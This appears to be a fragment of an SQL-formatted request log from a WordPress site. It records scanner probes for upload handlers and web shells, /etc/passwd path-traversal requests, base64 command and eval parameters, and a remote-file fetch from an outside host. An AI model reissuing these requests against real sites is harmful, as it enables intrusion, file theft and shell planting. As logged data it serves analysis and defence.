(0xaaff352c0abb389c1bbff489fbc1c962, 1468448812, '/system.php?q53b3a6'),
(0xb1286abe47291c2a6d121250f9ecc4d8, 1468448812, '/system.php?n53b3a6'),
(0x59c6bb4ef0507ee4141508a342097f3c, 1468448812, '/press.php?n33beb2'),
(0xbc5f4c4e23e99959dd059846a98e79a9, 1468448813, '/error.php?q503876'),
(0xb42fc6592828310a355c59e3e03f38e1, 1468448813, '/template.php?q13e558'),
(0xbf56c7ff48d977682966693affdd6dbe, 1468448813, '/cache.php?qaea521'),
(0xcb081898359ce198c9b8dd6b1d296999, 1468448814, '/template.php?n13e558'),
(0x404bb7b5cae46180fc1cb60008efc1f6, 1468448814, '/dump.php?q59a097'),
(0x087bcad1a21450d6e793399babc5b183, 1468448815, '/include.php?q872b97'),
(0x540510e66766bb7139b1c80afe8540c4, 1468448815, '/files.php?q23f412'),
(0x27f08185320d0dd5414267470a36559e, 1468448816, '/cache.php?naea521'),
(0x2d5d282295321c1376384a4d47a2158f, 1468448817, '/menu.php?ndfbe75'),
(0x2dc7a4380f87d7333955f750a7249717, 1468448817, '/global.php?n89024b'),
(0xd3b1c83780825ade982e79b695bcefe9, 1468448818, '/plugin.php?q55d3bf'),
(0x357f7c382837e8484c09fbf1f1ff986c, 1468448818, '/lib.php?q828043'),
(0xe36d9a6646de0067099e985af53ae8c9, 1468448818, '/blog.php?q7f69dd'),
(0x4555af65d3829bd9835fb2379672eecf, 1468448818, '/inc.php?n318a65'),
(0xf500051e525123691dd965fa1fc72fb4, 1468448818, '/themes.php?nf385ab'),
(0xfb95421dc7d84e70697905534fe31b37, 1468448818, '/defines.php?qa04af1'),
(0x7d9715c597ebbc755722e61b4d2c7058, 1468448818, '/javascript.php?q642afe'),
(0xeb368d2247d716288770585cc98ddde3, 1468448818, '/model.php?n726b60'),
(0x36cc57323808265e61163298808b6577, 1468448819, '/page.php?nf0b08a'),
(0xc5cab266644f347250ac5dd08d1197f2, 1468448820, '/start.php?q7f2521'),
(0x79ed21926a9ca06a6ead2c575dfad24b, 1468448821, '/dump.php?n59a097'),
(0x213fa6b04fa86efbda2aa13e125d3324, 1468448821, '/sql.php?q703018'),
(0x4b601beb3578929c9fb3ad23921fa036, 1468448821, '/stats.php?qf73356'),
(0x5d5bb38d597559aee048ae2257365170, 1468448822, '/lib.php?n828043'),
(0x39cc47a39752deb7beae77f4267a35f9, 1468448823, '/css.php?nd335c3'),
(0x1180d6ffa47bdda74f2f97e78534b853, 1468448823, '/plugin.php?n55d3bf'),
(0x1f1292aa0bf959990f16922fd78ef9c3, 1468448823, '/error.php?n503876'),
(0xa3cc60b929069044fc05fc67c86bb3a4, 1468448824, '/css.php?qd335c3'),
(0x9bd627a1b1f234d32e8b322e3db3cadb, 1468448824, '/db.php?n95e668'),
(0x40f40f7fd42a1ff812dd6e01c4710f78, 1468448824, '/dirs.php?n071238'),
(0x318a1e2e7eba35ba0e0c2bd62f6be8e3, 1468448824, '/user.php?n42dabb'),
(0x74d1374d96c8e77c32337785d9728370, 1468448824, '/session.php?q79c1ec'),
(0xb0d043cfabf8a67f63a6e68850e4bb82, 1468448824, '/header.php?n1c1ae6'),
(0x35cfd74dadcc777b47d5dac97d489da2, 1468448825, '/menu.php?qdfbe75'),
(0x68ab65101a8ca4bd90ef190be5cf1450, 1468448825, '/functions.php?n78cd5a'),
(0x08f01d2a2ef9fb7e5931386998f721fa, 1468448825, '/utf.php?ne91e7a'),
(0xd8976e6b4f95d3fa3ab51a31d3e4ab1b, 1468448826, '/global.php?q89024b'),
(0x90a0a2d320f950aa69afc8760b3a8f60, 1468448826, '/defines.php?na04af1'),
(0xa527617f33f4e4c4180f66d9671b97b6, 1468448827, '/include.php?n872b97'),
(0x1105119eabba5e6810caadb27dd7a899, 1468448827, '/footer.php?n44390c'),
(0x710def34f9045bd5f60e6c39102eca87, 1468448827, '/ini.php?n760097'),
(0xc984656f1b9990fb44a0905bd403c9c5, 1468448827, '/page.php?qf0b08a'),
(0x96e35545dbe6d1994a0dcad57f2ac728, 1468448827, '/ini.php?q760097'),
(0x3a580c109dc7ee55106636f8cdb33f0c, 1468448828, '/javascript.php?n642afe'),
(0xe58a6aaa692ddd34cdcc47e5acad6224, 1468448828, '/user.php?q42dabb'),
(0x7310a7cbb2fe0ed1d2082974a848c3a3, 1468448828, '/dirs.php?q071238'),
(0x5c075a95340bb590c8e2d580643467ac, 1468448828, '/ajax.php?qf03c87'),
(0x8d65f51972ac27e99d1a253563333134, 1468448828, '/start.php?n7f2521'),
(0xd2c9a40a9afb6e5984f1d641b5e933db, 1468448829, '/title.php?n6fc9cb'),
(0x6fa0deee93445056bff0eb883004a0a1, 1468448829, '/article.php?q0e7f9c'),
(0xa86ed3cd69646b9bca23cc7b0e256489, 1468448829, '/themes.php?qf385ab'),
(0xab39b88559b3f84ca89adec0b7e62088, 1468448829, '/diff.php?nf76775'),
(0xff63f9aac2ffd10a93cc6857e3c35728, 1468448829, '/stats.php?nf73356'),
(0x3c3cee187bd83de1c072862f0d84be71, 1468449047, '/view.php?nbc8a20'),
(0x76c04a82901b0d78411b6e344e6e4465, 1468449620, '/code.php?qd6e706'),
(0x45798bf58c748ed40be8f6f34e96f9c3, 1468455627, '/xml.php?n3729f7'),
(0x32e601a8b5b372202772eebf4cbe8bc0, 1468458292, '/wp-content/themes/highlight/style.css'),
(0x46485889a67dcff89cde54254b2c43c8, 1468483704, '/wp-content/plugins/php-event-calendar/server/file-uploader/'),
(0x590ea95205c53458c1ae142d4b1c2bc8, 1468519178, '/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php'),
(0x373a8bcd3142b6e23c7e8c4f5b641fc5, 1468543136, '/wp-content/plugins/complete-gallery-manager/frames/upload-images.php'),
(0x654bae92fc71da1b134ab708155cb105, 1468590539, '/wp-content/uploads/wpcf7_captcha/758895385.png'),
(0xd0b89b171118e0d957e0c7ee9875c832, 1468605750, '/wp-content/themes/rayoflight/functions/upload-handler.php'),
(0x94cda96335d2841954e8b14bd3858bc5, 1468617441, '/wp-content/themes/highlight/lib/utils/upload-handler.php'),
(0x524ec9caf1b8fce8e4c6d4b171b8a9c1, 1468625549, '/wp-content/plugins/sexy-contact-form/includes/js/eye.js'),
(0xecfdcf88ba850e4beec422ee1789db85, 1468649538, '/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php'),
(0x1dce27e40a6ad66762cb869f8deedc77, 1468680350, '/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php'),
(0x41464468178d70b9254b5d84d10c8863, 1468681755, '/license.php'),
(0x8eba496fd7b9e68cb4fe61269590f64c, 1468692610, '/wp-content/plugins/form-lightbox/colorbox/style-1/colorbox.css'),
(0xc8692a0c057c1ae621e2702cad6a7984, 1468702951, '/wp-content/uploads/wp-cache.php'),
(0xe75921820c84c3af5ab356b873b11593, 1468702952, '/wp-cache.php'),
(0x52b20339eab3e6807e9cf6a24a36d3e5, 1468702954, '/wp-content/plugins/revslider/temp/update_extract/wp-cache.php'),
(0xf4acd4fa8acb4dd0b0eba8e15dcbb175, 1468702954, '/uploadify/uploadify.php?folder=/'),
(0xb8be69e7712637489a73f4c933fb7663, 1468702955, '/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=d3AtY2FjaGUucGhw&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x95da9af9c0868bbfb07522758e736279, 1468702956, '/wp-content/plugins/wp-cache.php'),
(0x88af968f9c93d6dd0bbdf6bb465bb10c, 1468702957, '/sites/all/libraries/elfinder/php/connector.minimal.php'),
(0xb0494ab4488b7e6ae54f366c48249726, 1468702957, '/sites/all/libraries/elfinder/files/wp-cache.php'),
(0x3aa4f062d80573fc154bb6ff023da917, 1468703709, '/wp-content/themes/TheGoodNewsWP105/style.css'),
(0xc939a0d382ac40f5c6464ec9da7df6fd, 1468792737, '/wp-content/plugins/mailcwp/js/mailcwp.js'),
(0xd7bf7ba73ba3e90c11be89f86644bc66, 1468795597, '/wp-content/themes/switchblade-v1.3/framework/_scripts/valums_uploader/php.php'),
(0x4d09080c83fd02c911e5002a5c4540fe, 1468872067, '/wp-content/plugins/html5avmanager/lib/uploadify/custom.php'),
(0x58d26ee75c02a4e25878c520ba1441c2, 1468903206, '/wp-content/themes/thecotton_v114/style.css'),
(0x38eb3a537f8ebd55ffc80452314f61b7, 1468933157, '/wp-content/themes/drochilli-child/uploadify/uploadify.php'),
(0x4cbd2e85c18b981383c1843f20142e82, 1468980901, '/wp-content/themes/saico/js/custom.js'),
(0x130c72b8d5f1034a1a3b3ef5d5c3b5fd, 1468986442, '/wp-content/uploads/wpcf7_captcha/1332241042.png'),
(0xba909b44cf9b50134ed01a5f820a730d, 1468986766, '/phpmyadmin/'),
(0xef7933a1e3c944a1177680e360b468f8, 1469001519, '/wp-content/plugins/font-uploader/fontFunctions/fu_script.js'),
(0xd2af202387b55560e8e0301905dda9b3, 1469017695, '/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php'),
(0x25bcde80bd81a124cd01615e9210a5c4, 1469040812, '/wp-includes/js/tinymce/skins/wordpress/images/wp-manage.php'),
(0x21e7d4194aad0cfea60f8e884f044532, 1469107888, '/wp-content/plugins/sfbrowser/css/sfbrowser.css'),
(0x9a8f2d8d90aa8446ebc507cdb556d5c1, 1469119084, '/wp-content/plugins/jquery-html5-file-upload/readme.txt'),
(0xe78144682399e1cefd76495940dc0c36, 1469137610, '/wp-content/themes/deep-blue/css/blog.css'),
(0xdc2facc49fe6a3787fed890f42234738, 1469185666, '/wp-content/themes/purevision/style.css'),
(0x29405866648baae58f0a1f3fb26fade1, 1469206933, '/wp-content/plugins/simple-ads-manager/readme.txt'),
(0x716a36eecbf5b8396017b32cc5d0608d, 1469207160, '/wp-content/plugins/page-flip-image-gallery/upload.php'),
(0x29558efd2e918655e9e0b08efdb6bd37, 1469214619, '/wp-content/themes/deep-blue/megaframe/js/cufon.js'),
(0xbf7b294c2081225488aa3220f2a3fac9, 1469214661, '/wp-content/plugins/flipbook/php.php'),
(0xe6bde8b2016c1e17e89d81b8b6c725e8, 1469247601, '/wp-content/plugins/simple-ads-manager/js/slider/tmpl.js'),
(0x026ab704e1ec2e79fa8e9a04eb43cae6, 1469247603, '/wp-content/plugins/formcraft/file-upload/server/php/upload.php'),
(0x0c0fea4db5307af731938f2656483e2a, 1469247605, '/wp-content/plugins/revslider/temp/update_extract/revslider/db.php'),
(0xe6ed294949f440c65271d33edae65649, 1469262095, '/wp-content/themes/u-design/style.css'),
(0x48747f698eeebc318a589bb4edd38d2b, 1469275054, '/wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php'),
(0xa5b46fbf0c50760fe59d5bfa3e41c881, 1469311083, '/wp-content/themes/sketch/404.php'),
(0x9566e14481598bf9629ce6c59e3a4161, 1469311085, '/wp-content/plugins/wp-db-ajax-made/wp-ajax.php'),
(0x24be9c46357202a06b3a6b4796293b5f, 1469381223, '/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php'),
(0x77db09cd147ea92fab132b86363cd0bf, 1469381224, '/wp-content/themes/felici/sprites/js/uploadify/uploadify.php'),
(0x7ea6805e419f0ec109300b8acc7baf05, 1469409949, '/.git/config'),
(0x2588afa2526d8558d847291e34a862fa, 1469472237, '/wp-content/plugins/lb-mixed-slideshow/libs/uploadify/css/uploadify.css'),
(0xcbb4141f7eee42bbf9a4561e007922af, 1469486666, '/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php'),
(0x99750115a58eb50126d1310860773f71, 1469521773, '/wp-content/uploads/wpcf7_captcha/1305374553.png'),
(0xcba64bc4ef4e1c39eed76318b93e99ea, 1469571848, '/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php'),
(0x681fc7b7413b964023dc367105d91300, 1469579475, '/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.css'),
(0x68baf542b74d01ebecbd51f38a7bc6ce, 1469587193, '/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php'),
(0xbf83851226fb4844769a88f40e0aa210, 1469609023, '/wp-content/themes/area53-v1.0.2/framework/_scripts/valums_uploader/php.php'),
(0x682c78a3b0e787f51a4ee605741de527, 1469642509, '/wp-content/themes/konzept/includes/uploadify/upload.php'),
(0x569273bf6e53d346e682ecd188e17b7b, 1469642689, '/wp-content/plugins/omni-secure-files/plupload/examples/upload.php'),
(0x8d099d705a5e6ba729f20229cfb4830a, 1469677155, '/root2.php'),
(0xf80c1c8e852085df59b9eb948345bd9b, 1469677164, '/sic-wp-content/themes/saengerjugend/footer.php'),
(0x55d53b167b0cd4b43245e7aaf3d61e95, 1469677168, '/sonatah.php'),
(0x124b4e7a84988f60633bcec842ad4748, 1469677173, '/stats/setup.php'),
(0x9412494a10e5fcf800ac55358f6f3964, 1469677177, '/support.php'),
(0x79e08e9e31269c9ced8a43426c0306ad, 1469677180, '/symlink_3.php'),
(0x19ac49854471c922cf373baedff42348, 1469677184, '/sys/Sym.php'),
(0x9467f505aea34442882f853e98b90c91, 1469677188, '/tmp/setup.php'),
(0x1876b4571ff4b210548f004205049227, 1469677190, '/update/123wso123.php'),
(0x11014016e14ab908b42753ae0816e2a1, 1469706429, '/wp-content/uploads/wpcf7_captcha/183281058.png'),
(0x8c9675b6b677dd1a20dcca4373cc89c1, 1469707360, '/.git/'),
(0xd2eb95f6f2d63ad835daf7ec95d5c1e6, 1469719080, '/wp-content/plugins/mac-dock-gallery/css/style.css'),
(0x5ba6548407214e167e22f1c06153640e, 1469726314, '/tmp/sfx.php'),
(0xe6dcff00a7bcd01d34cc35a81e403fcf, 1469730776, '/wp-content/plugins/ecstatic/readme.txt'),
(0x0038c292d9e6b4f357f68b96073de971, 1469730781, '/wp-content/themes/konzept/style.css'),
(0x7e09162f28faa4f7ab5bdd6e8c676ebf, 1469773241, '/wp-content/uploads/BirdsRio.php'),
(0xa06031792f88f364de99070910fadf03, 1469773242, '/BirdsRio.php'),
(0xef3617568355e22e5edcc5c7983ddddc, 1469773244, '/wp-content/plugins/revslider/temp/update_extract/BirdsRio.php'),
(0xe1f00da5c8c9382f2e0ebb7abf6dcc54, 1469773245, '/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=QmlyZHNSaW8ucGhw&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x39d9624126de47ba8ccb9bcec315fbbd, 1469773246, '/wp-content/plugins/BirdsRio.php'),
(0xfb6785119e44cf9826186d687f266c80, 1469825318, '/wp-content/plugins/content-flow3d/shortcode/upload.php'),
(0x6ab225012fe50c291011733d3946471f, 1469866693, '/wp-content/themes/ut-strange/addpress/css/style.css'),
(0xc1c001b3824c973473bebcf79c55b861, 1469909738, '/wp-content/plugins/picturesurf-gallery/upload.php'),
(0x4e90bbf06bf426e287d0dfa64f069dcf, 1469963065, '/wp-content/plugins/wp-easy-gallery-pro/admin/php.php'),
(0x42f4c2bdd88e02fffa1b957547dae586, 1469968702, '/browserconfig.xml'),
(0x3dd7c3ca29db107055a8b56caa7e68f8, 1469978619, '/wp-content/plugins/rbxgallery/js/script.js'),
(0xdc28a8d8eed6c077a8c41a66ed71b366, 1469997277, '/wp-content/themes/lightspeed/functions/jwpanel/scripts/valums_uploader/php.php'),
(0x7b95ef608609b3824e0c17dd13084cdc, 1470061687, '/wp-content/plugins/wpmarketplace/uploadify/swfobject.js'),
(0xa11e9e37b0161606cd5d3e5c26706d55, 1470063589, '/?author=4'),
(0x0d91205a6058c06c282cf11df8055cf4, 1470072951, '/wp-content/themes/nuance-v1.2.4/functions/jwpanel/scripts/valums_uploader/php.php'),
(0x997da286bc2da09061e772b73a459136, 1470080451, '/wp-content/plugins/wp-mobile-detector/themes/anakin-mobile/style.css'),
(0x84c09ef767fc6be9cbb9b9de00a928a9, 1470141626, '/les-seances-namur/ca'),
(0x77b78df7ced5488c9c58a8393b9ddc68, 1470169712, '/wp-content/plugins/nmedia-user-file-uploader/doupload.php'),
(0xc5481c7c50d91354938ecb6a3f468c7e, 1470189846, '/wp-content/themes/Famous/style.css'),
(0xe8f5d7cf13e0ecefe7aa95ebee5bae1d, 1470237568, '/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php'),
(0x931330a655f23ca0bfef10d7e220b568, 1470246114, '/wp-content/plugins/accordion/js/swfupload/js/upload.php'),
(0x2ee3316697cccc66f88e751902045c11, 1470298441, '/wp-content/plugins/fluid_forms/file-upload/css/style.css'),
(0xf949786e647380a3f395317fdd6bf080, 1470316758, '/wp-posts.php'),
(0x4b3af16bd714fac0124bd07e64d8d55b, 1470320685, '/fckeditor/editor/'),
(0x6b7d985df8cd2ba9f199f8c32b57549a, 1470325902, '/wp-content/plugins/invit0r/lib/php-ofc-library/ofc_upload_image.php'),
(0x28657a768e5d2f078b1c33be5d017462, 1470353071, '/wp-content/plugins/revslider/js/admin.js'),
(0x2831e6becd06817d7d095f1b60975446, 1470382399, '/fuckyeh'),
(0x5ac693650447718d04091523bccbbdab, 1470382571, '/wp-content/plugins/hungred-post-thumbnail/js/hpt_ini.js'),
(0xefdad48cd69a87aea5794916905cd600, 1470390605, '/wp-content/plugins/wp-front-end-repository/readme.txt'),
(0x52de360e5c28f6d3936173372b613eba, 1470439928, '/wp-content/plugins/nmedia-user-file-uploader-pro-v7.3/js/ajax.js'),
(0xea7ded126b6c344d3a9a7f71a7121ee4, 1470444542, '/wp-content/themes/deep-blue/style.css'),
(0xe26737a8dc093325914e97f0f0026a63, 1470497236, '/wp-content/uploads/wpcf7_captcha/1141445954.png'),
(0xed445d4857e6176ecc55fd88e358fb2a, 1470512628, '/wp-content/themes/area53/framework/_scripts/valums_uploader/php.php'),
(0xbe0acb5f404cc7b902414a34a4948a05, 1470537820, '/update/update/js/js.php'),
(0x717c51838a4762b9719a00912100ba7e, 1470537827, '/validate.php'),
(0xbe60f222921afb0f16ad729d40afa415, 1470537833, '/weight-loss-plans/cache/gif/mssqli.php'),
(0x34c71370c02ee6bde9f595b6233e7d0a, 1470537839, '/wp-admin/class.gd-img.php'),
(0x1a570b9ad0d693ecfbd94467b55acd3c, 1470537845, '/wp-admin/class-adminsbar.php?alien=1'),
(0x60207888ca85ad8310ed387592b36fcb, 1470537852, '/wp-admin/css/c3ll.php'),
(0xced8e613d4c26211e763a16ea85b5593, 1470537859, '/wp-admin/css/class-wp-upgrader.php'),
(0x5bb32abce6a9e38d023b08f8dff763f5, 1470537864, '/wp-admin/css/colors/cache.php'),
(0x4adc7a5f3a583b85579f5b0a6a453b0e, 1470537870, '/wp-admin/css/css.php'),
(0x399364a0fac82f53f0d396fc50931ce2, 1470553447, '/.google-analytics.com/ga.js'),
(0x66a4833f24e4aa738853b1232a0ef02a, 1470554584, '/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.js'),
(0x9f45e2cc006dfd4b70e4c7972a1ccaeb, 1470558784, '/wp-content/plugins/front-file-manager/readme.txt'),
(0xa22758d3c5bcde92daa5868bd0801ac8, 1470608700, '/wp-content/uploads/wpcf7_captcha/126895956.png'),
(0xdac8da945093d685684b5352ba2e0a39, 1470627574, '/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.relationshiptips.club/cache/db.php'),
(0x89b67669b22f291047ade895dd36017d, 1470627579, '/wp-content/plugins/wp-mobile-detector/cache/db.php'),
(0xe40a10fe2bdada5f98d4e75f9f6618d7, 1470627603, '/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd'),
(0xbcbad46be3498cd5fa3a4cecacaaa428, 1470627607, '/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd'),
(0x0c8b4863badef919000f92d198a0b8a0, 1470627608, '/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'),
(0x117ae3eee371a5e12e9f3d6ad04a1af2, 1470627611, '/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'),
(0x3b13f0b7c322768d5ce2c5c409d62513, 1470627615, '/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd'),
(0xa9a8bff15543066db31a48263c0a8948, 1470627627, '/wp-content/plugins/wp-symposium/server/php/WmUVxVcDnjczts.php'),
(0x13beab93b9b8e14d9f2272990df30bd6, 1470641540, '/wp-content/uploads/wpcf7_captcha/1439580919.png'),
(0x1d6c7f13a5fd7c4cacbd01d639bf5f2d, 1470642768, '/wp-content/plugins/wp_optin_pro/autorespond.js'),
(0x3ec135ad8e4a67204f47ac3fe658b5b7, 1470661101, '/wp-content/uploads/wpcf7_captcha/1620112865.png'),
(0xfae354f8873cd7303ee823436e7800be, 1470668020, '/wp-content/uploads/wpfoot.php'),
(0xf497fa496b1a581f29c60bd8482d9c34, 1470668022, '/wpfoot.php'),
(0x48672acd8200beb27411d5d07ec4d92f, 1470668024, '/wp-content/plugins/revslider/temp/update_extract/wpfoot.php'),
(0x7ec73795c95993a8a4680db0492d5cc4, 1470668028, '/tiny_mce/plugins/tinybrowser/upload.php?type=file'),
(0x0f3115a036f1be22dd93ecfdd71189a4, 1470668053, '/tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass='),
(0xca417939d1a34ebbdc2c31a981f8e702, 1470668054, '/wpfoot.php.suspected_'),
(0x4f815a145cd45d605b26a1a27cf0de72, 1470668055, '/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=d3Bmb290LnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x7e69f2baa4200c1836eef1b75d13c16b, 1470668056, '/wp-content/plugins/wpfoot.php'),
(0x7a5eea8d890f13592b14271423934121, 1470668057, '/sites/all/libraries/elfinder/files/wpfoot.php'),
(0xba5eaa28b793d8392cc70ce01e7fe27c, 1470668058, '//wp-content/plugins/jquery-html5-file-upload/jquery-html5-file-upload.php'),
(0x0b4e5cce4f1361bedbb75274882a3b5d, 1470668060, '/wp-content/uploads/files/guest/wpfoot.php'),
(0xf03cd028e8afbadf9780316fd2fc841a, 1470706658, '/wp-content/themes/kiddo/style.css'),
(0xe47a424603eac6d34e3848e03c65c0dd, 1470729422, '/wp-content/plugins/ecwid-shopping-cart/css/frontend.css'),
(0x326975a007812bd1d1f50efde374f975, 1470744590, '/wp-content/themes/atom/uploadify/uploadify.css'),
(0xfb5f63f40d9ccc338750a4be96ca837b, 1470749887, '/wp-content/uploads/wpcf7_captcha/227190070.png'),
(0xcb1315dc2fd97fc3a6af8d88400a578d, 1470763858, '/wp-content/themes/holding_pattern/admin/css/up_framework.css'),
(0x197f8bbc4fdb4ff4cf440c689cffa960, 1470785882, '/js/fckeditor/editor/'),
(0xa0fa2f2552e2537877eb66476ccf73d6, 1470801517, '/wp-content/themes/kiddo-turf-parent/style.css'),
(0x1ef73d34d300bb4188e444c03f079fb9, 1470830404, '/wp-content/plugins/dzs-zoomsounds/admin/upload.php'),
(0x544c112b34806896fb466544fa3e8c1b, 1470855006, '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'),
(0x2debaa3194524e19e232cea0579bd832, 1470885531, '/wp-content/themes/kiddo-turf-child/style.css'),
(0x3b4ff3979d0b312a3ad7ebd01f643afa, 1470917009, '/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.css'),
(0x0f274982b238b689d25916b9e99d7446, 1471000515, '/wp-content/plugins/estatik/readme.txt'),
(0xf8030c2ac9b16cd5c744ee6b3555d823, 1471063326, '/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php'),
(0x8e82769bdd16c282afe0eba2b6b57447, 1471093144, '/wp-content/plugins/wp-vertical-gallery/readme.txt'),
(0x2d59582ea51d7b1b3ae8a943acb88aad, 1471103915, '/wp-content/plugins/wpmarketplace/readme.txt'),
(0x571f5f2de64b1eb3998148e9d0af8c88, 1471106788, '/js/mage/cookies.js'),
(0x0f47ebc056060cc5bd73164ff99bdac0, 1471237237, '/wp-content/uploads/wpallimport/uploads/863ca013b605eae7441b8d7b50c5de0b/db.php'),
(0xecc5150124f28808868eba2c909dede9, 1471285279, '/wp-content/plugins/pitchprint/uploader/'),
(0xb358a4142241209cc064b30e2213e0fe, 1471337911, '/admin/fckeditor/editor/'),
(0x9e1dfb4c2913251f30c3803aa44678d6, 1471349660, '/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php'),
(0xc33ecd8b968ed4fb5cc5e0d1104bfdb0, 1471356840, '/wp-content/themes/pinboard/themify/css/colorpicker.css'),
(0x0be1d605e9c480e3971cd37409136d42, 1471386430, '/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/js/markermanager.js'),
(0x42c2b080769672023cde10a2e5f1fcb7, 1471411921, '/wqeqeq'),
(0x06c5a75da96f08260d7605252d2ed6a4, 1471419154, '/wp-content/themes/Directory/style.css'),
(0xe37610d84c63d90bb61a8f78587cb4b4, 1471477228, '/wordpress'),
(0x192db5a48ae26c54587128d48fecc891, 1471522667, '/wp-content/plugins/wpe-indoshipping/admin/upload-file.php'),
(0x4fbe56d6a8c73b0b646d1013b4be6185, 1471540893, '/wp-content/themes/gallery/style.css'),
(0xf0ec57496eab0ae97efdf53755b4e903, 1471589359, '/wp-admin/css/export.php'),
(0xaf1abb082cb7c4310f810c684076ef6d, 1471589363, '/wp-admin/css/layour/function.php?Asia%2FJakarta=1'),
(0x8321c423f406528171cbcc9cc34e56c8, 1471589367, '/wp-admin/css/profile.php'),
(0x34b05b86dabffe2a9fa519a6ca33dbda, 1471589370, '/wp-admin/css/themes.php'),
(0x97fd0d1762729b83abd0f5078afbc97c, 1471589372, '/wp-admin/css/upgrade.php'),
(0x9f7b1cb38791b26714cae106463e177d, 1471589375, '/wp-admin/edit-error-tags.php'),
(0x6949fdcc7b233b88f3fda839645d5cb1, 1471589380, '/wp-admin/images/mssqli.php'),
(0x9f5aec0e79ab8722f5f3fde1bf1b0703, 1471589383, '/wp-admin/images/screenshots/olive.php'),
(0x8c8c92d7659c483dd9d87b833769bf2c, 1471589386, '/wp-admin/includes/controller.php'),
(0x6a1147a0b9bfe2ee76e5aa2548b33a9d, 1471609787, '/wp.php'),
(0x5ed8fedac124935b206513955ee97e08, 1471609802, '/wp-includes/login.php?login=cmd'),
(0x5b35fde060633769ff5633060121efc8, 1471609815, '/sitemap.php'),
(0xb0d5c358d8999d8973a357c777d552ff, 1471609832, '/wp-misc.php?t3731n=1'),
(0x364c3f5263aba285d6c8df38a35e7e5d, 1471609848, '/wp-includes/Text/Diff/Engine/authorize.php'),
(0x4d6e55b2f54d711198a224482058350c, 1471609861, '/wp-includes/pomo/sess.php'),
(0xcd6457525a1363fe66e1113c46928a3d, 1471609870, '/wp-includes/sess.php'),
(0x68c75ec1ce63aa87a800dc5b9656ee89, 1471609885, '/get.php'),
(0x81b7504dedb7cd208d67de7c4e6a0fa1, 1471609897, '/wp-includes/pomo/authorize.php'),
(0x314d6a6171247fa56dad117df7a376a7, 1471609905, '/wp-misc.php?t1478n=1'),
(0x1222f1f39657b0a0c81e1e2543157630, 1471609916, '/bookmark.php'),
(0xc5770f545ea4fc95fd367526d4b8d909, 1471609924, '/adodb.class.php?array=ZXZhbCgnZWNobyAxNTIyMzM7Jyk='),
(0x9f792001cf3e6404db1c8b57b438e41c, 1471609943, '/wp-includes/Text/Diff/Engine/sess.php'),
(0x56df9e961b79a84bd4e7aa2cb9b882ff, 1471609954, '/authorize.php'),
(0xd5605f21ddd9486d8ace179fbf3aa740, 1471609963, '/cacheplugin.php'),
(0xd3bce84ac7ddbf64cb8bf725d771010f, 1471609978, '/wp-admin/security.php'),
(0x797d971626cc883513ac0900e0a6c2f9, 1471609984, '/wp-misc.php?t1295n=1'),
(0x618f032e949cf9b145ed7eade555534d, 1471609996, '/security.php'),
(0x2252b54cd873b0cb57532fec89b3f59f, 1471610006, '/wp-content/security.php'),
(0xba316d90dfe480f5fadbef77caab5087, 1471610024, '/wp-installation.php'),
(0x77b4995704ca9b6668a71872bdba5ce1, 1471610043, '/wp-includes/security.php'),
(0x584c0218f7bb4f47b00b457515de8918, 1471610053, '/post.php'),
(0x97512090ab6db7f4af8a4f8098c16821, 1471610060, '/wp-content/login.php?login=cmd'),
(0x8342b74109c6ba6ac96870821ffa238a, 1471610069, '/login.php?login=cmd'),
(0x611728815559b7479e6d495631fd2fab, 1471610077, '/systemcache.php'),
(0x0c5669311d1dc306035a92db1fec3d4a, 1471610085, '/modx.php'),
(0x60e8369d38bea4b4058cfdfeb27e6c81, 1471610093, '/4005.php'),
(0xd75df61d163cdf91243dfac1087f166d, 1471610098, '/load-config.php.php'),
(0x7747911523786a534e2326b9077e92c7, 1471610105, '/privacy.php?youfindit=1'),
(0x2c0d1a1225e38d06d538ca02cc818d41, 1471610120, '/stats.php'),
(0xa40eee5cde82dba803af1ab0254e5027, 1471610121, '/shell.php'),
(0xde490ef1e193c61fcacc6ae756294853, 1471634949, '/wp-content/themes/radial-theme/functions/upload-handler.php'),
(0x3c859a7e865d270e4f50f5111142dc89, 1471694005, '/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.css'),
(0x05a41d784d61edb12e0b7af3283b81a9, 1471766372, '/wp-content/uploads/wpcf7_captcha/2000649787.png'),
(0xde6b5d06f3ec4e5a566a4749131f2801, 1471781540, '/wp-content/uploads/wpcf7_captcha/1519059757.png'),
(0x332a9f2d6c51894804dee7b87ca4fe3d, 1471804923, '/wp-admin/includes/image-import.php'),
(0xaf07ac927861a7c8c4b7ee82db10c4a0, 1471816203, '/wp-content/uploads/pl40d2dn.php'),
